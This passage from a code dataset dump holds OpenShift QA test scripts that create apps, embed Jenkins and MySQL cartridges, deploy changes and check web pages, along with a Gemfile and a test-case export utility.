tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5379989743232727, "alphanum_fraction": 0.5490020513534546, "avg_line_length": 46.95092010498047, "blob_id": "8aeef5d528bd6096800d5915b26a67cec1cd6262", "content_id": "2772c41967c45849b88d2988ee1de0f81f581979", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7816, "license_type": "no_license", "max_line_length": 211, "num_lines": 163, "path": "/automation/open/testmodules/RT/cartridge/add_remove_jenkins_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1178 & US1034] [rhc-cartridge] Add/Remove jenkins client for user app \nhttps://tcms.engineering.redhat.com/case/122367/\n\"\"\"\n\nimport rhtest\nimport common\nfrom shutil import rmtree\nimport fileinput\nimport re\nimport OSConf\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing self.config.test_variant, using `zend` as default\")\n self.test_variant='jbossews-2.0'\n #self.test_variant='zend'\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(7)\n self.jenkins_name = \"jenkins\" + common.getRandomString(5)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n common.env_setup()\n self.random_string = common.getRandomString()\n self.random_string2 = common.getRandomString()\n self.deployment_configuration = {\n \"php\": { \"index\" : \"php/index.php\" },\n \"zend\": { \"index\" : \"php/index.php\" },\n \"jbossas\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbosseap\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbossews\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"jbossews2\" : { \"index\" : \"src/main/webapp/index.html\" },\n \"python\" : { \"index\" : \"wsgi/application\" },\n \"ruby\" : { \"index\" : \"config.ru\" },\n \"perl\" : { \"index\" : \"perl/index.pl\" },\n \"nodejs\" : { \"index\" : \"index.html\" },\n }\n self.deployment_configuration[\"ruby-1.9\"] = self.deployment_configuration[\"ruby\"]\n self.deployment_configuration[\"python-2.7\"] = self.deployment_configuration[\"python\"]\n self.deployment_configuration[\"python-3.3\"] = self.deployment_configuration[\"python\"]\n self.deployment_configuration[\"jbossews-2.0\"] = self.deployment_configuration[\"jbossews2\"]\n\n def finalize(self):\n pass\n #rmtree(self.app_name, ignore_errors = True)\n\nclass AddRemoveJenkinsClient(OpenShiftTest):\n \n def deploy_changes(self, source, destination):\n try:\n index_file = self.git_repo + \"/\" + self.deployment_configuration[self.test_variant][\"index\"]\n self.info(\"Editing: \" + index_file)\n for line in fileinput.input(index_file, inplace = True):\n print re.sub(source, destination, line),\n except:\n fileinput.close()\n self.info(\"IO error\")\n return False\n fileinput.close()\n \n return common.trigger_jenkins_build(self.git_repo)\n\n \n def test_method(self):\n self.info(\"=================================\")\n self.info(\"1. Check 'jenkins-client-*' in the output\")\n self.info(\"=================================\")\n ( ret_code, ret_output ) = common.command_getstatusoutput(\"rhc cartridge list -l %s -p '%s' %s\" % ( self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS))\n self.assert_true(ret_output.find(common.cartridge_types[\"jenkins\"]) != -1, \"Cartridge 'jenkins-client' must be shown in cartridge list\")\n \n self.info(\"=================================\")\n self.info(\"2. Create a jenkins app\")\n self.info(\"=================================\")\n ret_code = common.create_app(self.jenkins_name, common.app_types[\"jenkins\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False)\n self.assert_equal(ret_code, 0, \"Jenkins server must be created successfully\")\n \n self.info(\"=================================\")\n self.info(\"3. Create an application\")\n self.info(\"=================================\")\n ret_code = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret_code, 0, \"The app must be created successfully\")\n \n\tif self.test_variant in (\"jbossas\", \"jbosseap\", \"jbossews\", \"jbossews2\",\"jbossews-2.0\"):\n if self.config.options.run_mode==\"DEV\":\n # 20120605: the jenkins jobs now accept small profile\n pass\n # JBoss needs larger node profile to build\n #ret = common.change_node_profile(\"medium\")\n #self.assert_equal(ret, 0, \"Changing node profile to medium should pass\")\n #time.sleep(30)\n \n self.info(\"=================================\")\n self.info(\"4. Embed jenkins client to the app\")\n self.info(\"=================================\")\n ret_code = common.embed(self.app_name, \n \"add-\" + common.cartridge_types[\"jenkins\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret_code, 0, \"Jenkins client must be embedded successfully\")\n \n self.info(\"=================================\")\n self.info(\"5. Make some change in the git repo and git push\")\n self.info(\"=================================\")\n ret_code = self.deploy_changes(\"Welcome to\", self.random_string)\n self.assert_equal(ret_code, True, \"Changes must be deployed successfully\")\n \n self.info(\"=================================\")\n self.info(\"6. Check the jenkins build urls\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(\n OSConf.default.conf['apps'][self.app_name]['embed']['jenkins-client-1.4']['url'],\n \"Last Successful Artifacts\",\n \"-v -L -k -H 'Pragma: no-cache' -u '%s:%s'\" % (OSConf.default.conf[\"apps\"][self.jenkins_name][\"username\"], OSConf.default.conf[\"apps\"][self.jenkins_name][\"password\"]),\n delay = 5, count = 10\n )\n self.assert_equal(ret_code, 0, \"Must be built successfully\")\n \n self.info(\"=================================\")\n self.info(\"7. Check the changes take effect\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(OSConf.get_app_url(self.app_name), self.random_string)\n self.assert_equal(ret_code, 0, \"Changes must be found on the web-site\")\n \n self.info(\"=================================\")\n self.info(\"8. Remove jenkins client from the app\")\n self.info(\"=================================\")\n ret_code = common.embed(self.app_name, \"remove-\" + common.cartridge_types[\"jenkins\"])\n self.assert_equal(ret_code, 0, \"Jenkins client must be removed successfully\")\n \n self.info(\"=================================\")\n self.info(\"9. Make some change and git push again\")\n self.info(\"=================================\")\n ret_code = self.deploy_changes(self.random_string, self.random_string2)\n self.assert_equal(ret_code, True, \"Changes must be deployed successfully\")\n \n self.info(\"=================================\")\n self.info(\"10.Check the changes take effect\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(OSConf.get_app_url(self.app_name), self.random_string2, delay=5, count=8)\n self.assert_equal(ret_code, 0, \"Changes must be found on the web-site\")\n \n return self.passed(\"[US1178 & US1034] [rhc-cartridge] Add/Remove jenkins client for user app\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddRemoveJenkinsClient)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5137614607810974, "alphanum_fraction": 0.5963302850723267, "avg_line_length": 17.16666603088379, "blob_id": "1e5079500b43d49b9a2857d049335e9a27496b5c", "content_id": "e77fbec0d39d29b3d9246ba6448ea5db62b0b7e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 109, "license_type": "no_license", "max_line_length": 28, "num_lines": 6, "path": "/automation/open/testmodules/RT/cartridge/app_template/mongodb/ruby/Gemfile", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "source 'http://rubygems.org'\n\ngem 'sinatra'\ngem 'mongo', '1.6.4'\ngem 'bson', '1.6.4'\ngem 'bson_ext', '1.6.4'\n" }, { "alpha_fraction": 0.6277546286582947, "alphanum_fraction": 0.6289458274841309, "avg_line_length": 30.679244995117188, "blob_id": "93dd83a0f6c1a67cdff4b8cd194d7295e1d6f8b0", "content_id": "d900f9620adc2420dbff05bde7af3359100b0003", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1679, "license_type": "no_license", "max_line_length": 144, "num_lines": 53, "path": "/automation/open/testmodules/RT/quick_start/quick_start_juvia.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\n\n\"\"\"\nimport os, sys\n\nimport common\nimport rhtest\n# user defined packages\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartJuvia(QuickStartTest):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby\"]\n self.config.application_embedded_cartridges = [ common.cartridge_types[\"mysql\"] ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Juvia\"\n self.config.git_upstream_url = \"git://github.com/openshift/juvia-example.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Welcome to Juvia\"\n \n def post_configuration_steps(self):\n steps = [\n \"cd %s\" % self.config.application_name,\n \"sed -i -e 's/\\$app/%s/g' -e 's/\\$domain/%s/g' config/application.yml\" % ( self.config.application_name, common.get_domain_name() ),\n ]\n ret_code = common.command_get_status(\" && \".join(steps))\n self.assert_equal(ret_code, 0, \"Post-configuration step must be successful\")\n \n def pre_deployment_steps(self):\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git commit -a -m custom_configuration\" \n ]\n ret_code = common.command_get_status(\" && \".join(steps))\n self.assert_equal(ret_code, 0, \"Post-configuration steps must be successful\")\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartJuvia)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6536540985107422, "alphanum_fraction": 0.6654561758041382, "avg_line_length": 36.982757568359375, "blob_id": "ce1a052e1a00ac1ff9b77a19cb1841c660f47a4a", "content_id": "7b740798461e63d32e8cf378753a266d245efdde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2203, "license_type": "no_license", "max_line_length": 113, "num_lines": 58, "path": "/automation/open/testmodules/UI/web/US1797_135712.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "'''\n [US1797][UI][Account Management]Change password from \"My Account\" page with invalid old password [P1]\n author: [email protected]\n'''\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135712(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n \n def test_u_s1797135712(self):\n driver = self.driver\n baseutils.login(self, self.cfg.new_user,self.cfg.password)\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n baseutils.go_to_account_page(self)\n\n\n driver.find_element_by_link_text(\"Change password...\").click()\n baseutils.wait_element_present_by_id(self, \"web_user_old_password\")\n self.assertEqual(\"OpenShift by Red Hat | OpenShift Change Password\", driver.title)\n\n driver.find_element_by_id(\"web_user_old_password\").clear()\n driver.find_element_by_id(\"web_user_old_password\").send_keys(self.cfg.password)\n\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(\"abcabc\")\n\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"abcabb\\t\")\n driver.find_element_by_id(\"web_user_submit\").click()\n time.sleep(5)\n baseutils.assert_text_equal_by_xpath(self, \"Passwords must match\", \"id('web_user_password_input')/div/p\")\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5956535935401917, "alphanum_fraction": 0.5969706773757935, "avg_line_length": 34.72941207885742, "blob_id": "5be038a9570a8c19621007b9825409334ecc8d3e", "content_id": "9a0e3d6cb1fdcdcc56e7968e952fc04d5c1a62ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3037, "license_type": "no_license", "max_line_length": 98, "num_lines": 85, "path": "/automation/open/bin/export_tcms.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport database\nimport tcms_base\nimport logging, logging.handlers\nimport sys\nfrom optparse import OptionParser\n\ndef config_logger():\n # create formatter\n formatter = logging.Formatter(\"%(levelname)s [%(asctime)s] %(message)s\",\n \"%H:%M:%S\")\n logger = logging.getLogger(\"dump_logs\")\n log_formatter = logging.Formatter(\n \"%(name)s: %(asctime)s - %(levelname)s: %(message)s\")\n \n stream_handler = logging.StreamHandler(sys.stdout)\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(logging.DEBUG)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(stream_handler)\n return logger\n\nlog = config_logger()\nparser = OptionParser()\n\n\ndef config_parser():\n # these are required options.\n parser.add_option(\"-u\", \"--update\", default='all', \n help=\"update the tcms_tags table with the latest dump from TCMS\")\n parser.add_option(\"-q\", \"--query\", \n help=\"query database to return testcases (tag_name|testcase_id) JSON string.\")\n parser.add_option(\"-t\", \"--testcases\", default='all', \n help=\"'all' default to all testcases, <testcase_id> to update a specific testcase_id\")\n parser.add_option(\"-c\", action=\"store_true\", dest=\"cases\", \n help=\"extract all testcase ids into a list\")\n (options, args) = parser.parse_args()\n \n return options, args\n\nif __name__ == '__main__':\n (options, args)= config_parser()\n \n if options.update:\n tcms = tcms_base.TCMS(test_plan='Test Plan for OpenShift 2.0')\n if options.update == 'all':\n # no name given then we update all tags\n tags, tags_obj = tcms.get_case_tags()\n for tag, tag_obj in zip(tags, tags_obj):\n log.info(\"Updating JSON for tag '%s'\" % tag)\n database.populate_tcms_testcases_by_tag(tcms, tag_obj)\n else:\n name = options.update\n log.info(\"Updating JSON for tag '%s' in DB\" % name)\n tag, tag_obj = tcms.get_case_tags(tag_name=name)\n database.populate_tcms_testcases_by_tag(tcms, tag_obj)\n\n \n elif options.query:\n try:\n case_id = int(options.query)\n testcase_dict = database.get_testcase_by_id(case_id)\n print testcase_dict\n except:\n tag_name = options.query\n tc_json = database.get_testcases_json_by_tag(tag_name)\n print tc_json\n elif options.testcases:\n tcms = tcms_base.TCMS(test_plan='Test Plan for OpenShift 2.0')\n if options.testcases == 'all':\n # update all testcases\n cases = tcms.get_testcases()\n for testcase in cases:\n res = database.populate_tcms_testcases(testcase, \n plan_id=tcms.plan_id)\n else:\n # just update a specific testcase id\n print \"Not supported at this time\"\n \n elif options.cases:\n res = database.get_all_tcms_testcases()\n print res\n else:\n pass\n" }, { "alpha_fraction": 0.440688818693161, "alphanum_fraction": 0.4502202570438385, "avg_line_length": 49.95918273925781, "blob_id": "b0e4b8b8a60dcadebdf49ebc24bc5f2ca4a3c11b", "content_id": "255c35a642c3735aa9c8828b39d3e02769f0ceba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12485, "license_type": "no_license", "max_line_length": 123, "num_lines": 245, "path": "/automation/open/testmodules/RT/client/snapshot_restore_mysql_data_to_existing_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport common, OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info((\"[US566][rhc-client] Archive/Restore app with embeded \"\n \"mysql db data to updated application\\n\"\n \"[US569][rhc-cartridge] embed MySQL instance to an app\"))\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing variant. Running test with default zend\")\n self.test_variant = \"jbossews\"\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n\n if self.test_variant == \"perl\":\n file_name = \"index.pl\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, \n file_name)\n target_file = \"%s/perl/index.pl\" %(self.app_name)\n url_path1 = \"index.pl?action=create\"\n url_path2 = \"index.pl?action=modify\"\n url_path3 = \"index.pl\"\n elif self.test_variant in (\"php\", \"zend\"):\n file_name = \"index.php\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, \n file_name)\n target_file = \"%s/php/index.php\" %(self.app_name)\n url_path1 = \"index.php?action=create\"\n url_path2 = \"index.php?action=modify\"\n url_path3 = \"index.php\"\n elif self.test_variant in (\"rack\", \"ruby\", \"ruby-1.9\"):\n file_name = \"rack/*\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, \n file_name)\n target_file = \"%s/\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"wsgi\", \"python\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, \n file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-2.7\"):\n file_name = \"applicationpython-2.7.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR,\n file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-3.3\"):\n file_name = \"applicationpython-3.3.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR,\n file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"jbossews\", \"jbossews2\"):\n file_name = \"test_ews.jsp\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\"% (WORK_DIR,\n file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n file_name = \"test.jsp\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\"% (WORK_DIR,\n file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n else:\n raise rhtest.TestIncompleteError(\"Unknown variant:%s\"%self.test_variant)\n\n self.file_name = file_name\n self.target_file = target_file\n self.source_file = source_file\n self.url_path1 = url_path1\n self.url_path2 = url_path2\n self.url_path3 = url_path3\n self.key_string1 = \"speaker1, title1\"\n self.key_string2 = \"speaker2, title2\"\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreMysqlDataToExistingApp(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, \n self.user_email, self.user_passwd],\n expect_return = 0,\n expect_description = \"App should be created successfully\")\n\t\n self.add_step(\"Get app url\",\n OSConf.get_app_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"Add mysql to this app\",\n common.embed,\n function_parameters = [self.app_name, \"add-mysql-5.1\", \n self.user_email, self.user_passwd],\n expect_return = 0)\n\n self.add_step(\"Copying test files to app git repo\",\n \"cp -f %s %s\" %(self.source_file, self.target_file),\n expect_return = 0)\n\n self.add_step(\"Get embeded mysql info - password\",\n OSConf.get_embed_info,\n function_parameters = [self.app_name, \n \"mysql-5.1\", \n \"password\"])\n self.add_step(\"Get embeded mysql info - url\",\n OSConf.get_embed_info,\n function_parameters = [self.app_name,\n \"mysql-5.1\",\n \"url\"])\n self.add_step(\"Get embeded mysql info - username\",\n OSConf.get_embed_info,\n function_parameters = [self.app_name,\n \"mysql-5.1\",\n \"username\"])\n if self.test_variant in (\"rack\", \"ruby-1.9\", \"ruby\"):\n modify_file = \"%s/config.ru\" %(self.app_name)\n else:\n modify_file = self.target_file\n if self.test_variant in (\"jbossas\",\"jbosseap\"):\n command = (\"echo 'Skip this step for jbossas app, because \"\n \"these are done automatcially by jboss server \"\n \"at server side'\")\n elif self.test_variant in (\"jbossews\", \"jbossews2\"):\n command = ( \"cd %s/src/main/webapp/ && \"\n \" mkdir -p WEB-INF/lib && \"\n \" cp %s/../cartridge/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar WEB-INF/lib/ \"\n ) % (self.app_name, WORK_DIR)\n elif self.test_variant == \"python-2.7\":\n command = (\"cp -f %s/../client/data/snapshot_restore_mysql_data/setupmysql.py %s/setup.py && \"\n #\"sed -i -e \\\"s/^.*install_requires.*$/ install_requires=['MySQL-python'],/g\\\" %s/setup.py && \"\n \"sed -i -e '{s/changeme_username/__OUTPUT__[7]/}' \"\n \" -e '{s/changeme_password/__OUTPUT__[5]/}'\"\n \" -e '{s/changeme_url/__OUTPUT__[6]/}' \"\n \" -e '{s/changeme_db/%s/}' %s\" )%(WORK_DIR,self.app_name, \n self.app_name,\n modify_file)\n elif self.test_variant == \"python-3.3\":\n command = (\"cp -f %s/../client/data/snapshot_restore_mysql_data/setupmysql33.py %s/setup.py && \"\n\t\t\t#\"sed -i -e \\\"s/^.*install_requires.*$/ install_requires=['mysql-connector-python'],/g\\\" %s/setup.py && \"\n \"sed -i -e '{s/changeme_username/__OUTPUT__[7]/}' \"\n \" -e '{s/changeme_password/__OUTPUT__[5]/}'\"\n \" -e '{s/changeme_url/__OUTPUT__[6]/}' \"\n \" -e '{s/changeme_db/%s/}' %s\" )%(WORK_DIR,self.app_name,self.app_name,\n modify_file)\n else:\n command = (\"sed -i -e '{s/changeme_username/__OUTPUT__[7]/}' \"\n \" -e '{s/changeme_password/__OUTPUT__[5]/}'\"\n \" -e '{s/changeme_url/__OUTPUT__[6]/}' \"\n \" -e '{s/changeme_db/%s/}' %s\" )%(self.app_name, \n modify_file)\n self.add_step(\"Modify test files according to mysql info\",\n command,\n expect_return = 0)\n self.add_step(\"Do git commit\",\n (\"cd %s && git add . && git commit -m test \"\n \" && git push\")% (self.app_name),\n expect_description = (\"File and directories are added \"\n \"to your git repo successfully\"),\n expect_return = 0)\n self.add_step(\"Access app's URL to create mysql data\",\n \"curl -s -H 'Pragma:no-cache' __OUTPUT__[2]/%s\" %(self.url_path1),\n expect_str = [\"Welcome\", self.key_string1],\n try_interval = 12,\n try_count = 10,\n expect_return = 0)\n self.add_step(\"Take snapshot\",\n (\"rhc snapshot save %s -f %s %s \"\n \" -l %s -p '%s'\")% ( self.app_name, \n \"%s.tar.gz\"%(self.app_name),\n common.RHTEST_RHC_CLIENT_OPTIONS,\n self.user_email, \n self.user_passwd),\n expect_return = 0)\n self.add_step(\"Access app's URL to create modify mysql data\",\n \"curl -s -H 'Pragma:no-cache' __OUTPUT__[2]/%s\" %(self.url_path2),\n expect_return = 0,\n expect_str = [\"Welcome\", self.key_string2],\n try_interval = 12,\n try_count = 10)\n self.add_step(\"Restore app from snapshot\", \n (\"rhc snapshot restore %s -f %s %s \"\n \"-l %s -p '%s'\") %( self.app_name, \n \"%s.tar.gz\"%(self.app_name), \n common.RHTEST_RHC_CLIENT_OPTIONS,\n self.user_email, \n self.user_passwd),\n expect_return = 0)\n self.add_step(\"Access app's URL to check mysql data is restored\",\n \"curl -s -H 'Pragma:no-cache' __OUTPUT__[2]/%s\" %(self.url_path3),\n expect_str = [\"Welcome\", self.key_string1],\n try_interval = 12,\n try_count = 10,\n expect_return = 0)\n self.add_step(\"Remove mysql from this app\",\n common.embed,\n function_parameters = [self.app_name, \"remove-mysql-5.1\", \n self.user_email, self.user_passwd],\n expect_return = 0)\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMysqlDataToExistingApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7158930897712708, "alphanum_fraction": 0.7158930897712708, "avg_line_length": 24.39285659790039, "blob_id": "0d93ff235f525962539cdd7b54124f33ccc3620d", "content_id": "1512d695736183306c99f6157db332cb112d008e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 711, "license_type": "no_license", "max_line_length": 63, "num_lines": 28, "path": "/automation/open/testmodules/RT/quick_start/quick_start_phpMongoTweet_zend.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_phpMongoTweet import QuickStartPhpMongoTweet\n\nclass QuickStartPhpMongoTweetZend(QuickStartPhpMongoTweet):\n \n def __init__(self, config):\n QuickStartPhpMongoTweet.__init__(self, config)\n self.config.application_type = common.app_types[\"zend\"]\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartPhpMongoTweetZend)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6322722434997559, "alphanum_fraction": 0.6417855620384216, "avg_line_length": 30.959064483642578, "blob_id": "37853f25d21325e669731ec210afb58c01780714", "content_id": "dbf2e49455c6a9564f3bcfbcbdd75e27cd60ff71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5466, "license_type": "no_license", "max_line_length": 163, "num_lines": 171, "path": "/automation/open/testmodules/RT/cartridge/jboss_env_vars.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: jboss_env_vars.py\n# Date: 2012/03/02 01:00\n# Author: [email protected]\n#\n\nimport sys\nimport subprocess\nimport os\nimport string\nimport re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1174] [rhc-cartridge] Import environment variables as system properties for jbossas-7.0 application\"\n self.app_name = 'jbossenv'\n self.app_type = 'jbossas'\n tcms_testcase_id = \t122366\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass JbossEnvVars(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a JBoss app\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed with MySQL\",\n common.embed,\n function_parameters=[self.app_name, 'add-%s'%common.cartridge_types['mysql'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n #3\n self.steps_list.append(testcase.TestCaseStep(\"Embed with MySQL\",\n '''\n cd %s &&\n cat <<'EOF' >src/main/webapp/test.jsp &&\n<%%@ page contentType=\"text/html\" language=\"java\" import=\"java.sql.*\" %%>\n<%%@ page import=\"javax.naming.*\" %%>\n<%%@ page import=\"javax.sql.*\" %%>\n\n\n<%%\nout.println(\"Welcome~\");\n\nString action=request.getParameter(\"action\");\nout.println(\"-\"+request.getParameter(\"action\")+\"-\");\n\nif (action == null) {\n action=\"\";\n}\n\nString context = \"\";\nif (action.equals(\"create\")) {\n InitialContext ctx = new InitialContext();\n DataSource ds = (DataSource) ctx.lookup(\"java:jboss/datasources/MysqlDS\");\n Connection connection=ds.getConnection();\n Statement statement = connection.createStatement();\n statement.executeUpdate(\"DROP TABLE IF EXISTS ucctalk\");\n statement.executeUpdate(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\");\n statement.executeUpdate(\"INSERT INTO ucctalk (speaker,title) VALUES ('speaker1', 'title1')\");\n ResultSet rs = statement.executeQuery(\"SELECT * FROM ucctalk\");\n ResultSetMetaData rmeta = rs.getMetaData();\n int numColumns=rmeta.getColumnCount();\n while(rs.next()) {\n context = context + rs.getString(1) + \", \" + rs.getString(2) + \"\\\\\\\\n\";\n }\n rs.close();\n statement.close();\n connection.close();\n\n out.print(context);\n} else if (action.equals(\"modify\")) {\n InitialContext ctx = new InitialContext();\n DataSource ds = (DataSource) ctx.lookup(\"java:jboss/datasources/MysqlDS\");\n Connection connection=ds.getConnection();\n Statement statement = connection.createStatement();\n statement.executeUpdate(\"DROP TABLE IF EXISTS ucctalk\");\n statement.executeUpdate(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\");\n statement.executeUpdate(\"INSERT INTO ucctalk (speaker,title) VALUES ('speaker2', 'title2')\");\n ResultSet rs = statement.executeQuery(\"SELECT * FROM ucctalk\");\n ResultSetMetaData rmeta = rs.getMetaData();\n int numColumns=rmeta.getColumnCount();\n while(rs.next()) {\n context = context + rs.getString(1) + \", \" + rs.getString(2) + \"\\\\\\\\n\";\n }\n rs.close();\n statement.close();\n connection.close();\n\n out.print(context);\n} else {\n InitialContext ctx = new InitialContext();\n DataSource ds = (DataSource) ctx.lookup(\"java:jboss/datasources/MysqlDS\");\n Connection connection=ds.getConnection();\n Statement statement = 